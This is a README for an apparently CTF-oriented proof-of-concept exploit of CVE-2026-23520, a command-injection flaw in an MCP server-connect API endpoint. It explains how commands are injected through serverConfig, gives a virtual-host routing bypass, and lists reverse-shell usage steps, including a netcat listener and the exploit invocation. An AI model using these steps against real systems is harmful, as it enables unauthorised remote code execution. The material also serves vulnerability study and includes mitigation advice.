kikechans/-Educational-PoC-CVE-2026-23520

# CVE-2026-23520: Model Context Protocol (MCP) Connect RCE - Educational PoC - Arcane **DISCLAIMER: This repository and the scripts contained within are strictly for educational and academic purposes only.** The information provided here is intended to help security researchers, system administrators, and students understand the mechanics of command injection vulnerabilities and virtual host routing within controlled laboratory environments (such as Capture The Flag platforms). **Never use this tool against any system, network, or infrastructure without explicit, written permission from the owner.** The authors take no responsibility for any misuse or damage caused by this software. ## Context and Vulnerability Overview This repository provides a Proof of Concept (PoC) for exploiting **CVE-2026-23520** within the context of the **Model Context Protocol (MCP)** implementation in certain application stacks (like Arcane v1.13.0). ### The Flaw The vulnerability is a classic Command Injection flaw. The API endpoint (`/api/mcp/connect`) accepts a JSON payload to configure a new server connection. The payload includes a `serverConfig` object containing `command` and `args` fields. Because the application fails to properly sanitize these fields before executing them on the host operating system, an attacker can supply malicious bash commands (such as a reverse shell) instead of a legitimate service path. ### The Catch (Virtual Host Routing) In many real-world or CTF deployments, simply sending the exploit to the main IP address will result in a `404 Not Found` error. This happens because the vulnerable component (e.g., `MCPJam Inspector`) is hosted behind a reverse proxy (like Nginx) that routes traffic based on the `Host` header. This PoC differs from standard exploits by explicitly allowing the user to specify the **Virtual Host (vhost)** to bypass the proxy routing rules and hit the vulnerable application directly. ## Usage This script requires Python 3 and the `requests` library. pip install requests ### Syntax python3 exploit_vhost.py ### Example (CTF Environment) 1. Set up a netcat listener on your machine: nc -lvnp 4444 2. Run the exploit, specifying the hidden virtual host: python3 exploit_vhost.py 10.129.x.x 443 mcp.target.local 10.10.x.x 4444 *Note: A "Read timed out" error is expected and indicates that the reverse shell has been successfully executed and is holding the connection open.* ## Mitigation Administrators should ensure they are running the latest patched version of the software. If patching is not immediately possible, restrict access to the `/api/mcp/connect` endpoint and ensure strict input validation is applied to all `serverConfig` parameters.